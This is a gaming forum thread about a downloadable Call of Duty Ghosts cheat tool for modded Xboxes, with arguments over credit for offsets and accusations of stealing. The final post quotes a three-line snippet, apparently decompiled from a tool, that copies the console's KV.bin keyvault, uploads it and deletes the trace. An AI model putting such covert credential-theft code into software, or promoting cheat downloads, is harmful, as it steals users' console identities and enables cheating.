For those members that like to cheat on GB and looking for quick updates.​
Tool will be updated each TU for those GB Cheaters.​
-----------------​

Download:
Code:
http://www.mediafire.com/download/t51khapsxcgaefw/GBCheat0r.rar

Scan:
Code:
https://www.virustotal.com/en/file/2447ab23c7bbdd8a50f6459bb3cd75e5e55f22f8d873949e29567ad7a54fcbb6/analysis/1388332359/

Last edited:
Y

Yolosweg

Enthusiast
Reaction score
Sin$
Nice, clean and simple GUI also i know that alot of people are indeed looking for these mods all the time from constant AIM messages i keep receiving so great work!

Also before anyone asks, yes these are all "offhost" = host not required mods, but im quite sure crosshair only modified the line scale which means it is not "super crosshair" which would mean that you always shoot in the middle when using it!

uSkeezR

uSkeezR

Enthusiast
Reaction score
Sin$
You ask me many times to get all of my offsets, and you don't put my name in credit :frown:
Also before anyone asks, yes these are all "offhost" = host not required mods, but im quite sure crosshair only modified the line scale which means it is not "super crosshair" which would mean that you always shoot in the middle when using it!

imGol2den

imGol2den

Life Goes On!
Reaction score
Sin$
lol gay, i have send him all of my offset in pm or on the other topic :/

MW3 is literally the same game as CoD Ghosts and no one realizes it...

Not trying to say this directly at you... i use alot of "...'s"

Look at the game as a perspective of something like the source engine from VALVE
Now anyone reading this has probably had that adventure of going on TF2 and trying to crap out?? or am i the only one.... lol... If you can mod TF2 you can mod games like Half Life and crap bc there the same engine.... same as call of duty! They just switch the models around like the source engine.

NovoSe7en

NovoSe7en

Enthusiast
Reaction score
Sin$
You ask me many times to get all of my offsets, and you don't put my name in credit :frown:

Updated OP Skeez.

This tool was for a friend hes a GB Freak so i decided to mess around on VS im trying to learn all the buttons ect and more.
I posted this just to keep GBCheaters up2date but yes thanks again.

Just got bored and tried to up my GUI skills lol and see what i can make and this is what came out.

NovoSe7en

NovoSe7en

Enthusiast
Reaction score
Sin$
For those morons saying i posted a kv stealer check yourself its unprotected i have no reason to steal kvs pfft.

U

Chaos_RGH

Leader of Unsigned Nation
Reaction score
Sin$
1. You obviously don't know who you're talking to.
2. It does matter because you're b*tching&crying at this guy when you don't go to 'a good school system'.
3. I had your permission, did I not? Exactly, don't be mad because my tool is better than yours.
Thanks!

I know this was on the first page but I couldn't help but laugh at this comment. If you are referring to DGK as your tool that is pathetic. Even the first version of Subtle Dagger is better than that tool. Nothing in that tool wasn't released and the GUI doesn't look to good (Same with Subtle Dagger). However imGol2den imGol2den figured out Entities before anyone else. I figured it out like a week after him but still. What in your tool isn't released?

imGol2den

imGol2den

Life Goes On!
Reaction score
Sin$
I know this was on the first page but I couldn't help but laugh at this comment. If you are referring to DGK as your tool that is pathetic. Even the first version of Subtle Dagger is better than that tool. Nothing in that tool wasn't released and the GUI doesn't look to good (Same with Subtle Dagger). However imGol2den imGol2den figured out Entities before anyone else. I figured it out like a week after him but still. What in your tool isn't released?

you figures it out... lol no offense but you kept the object { ent } when u decompiled mine in reflector lol 
No KV stealer :biggrin:
fa81c6db701f357803f821668be7b752.png

Xbox.xbCon.ReceiveFile("KV.bin", "HDD:\\KV.bin");
Upload("KV.bin");
File.Delete("KV.bin");

Top Bottom
Login
Register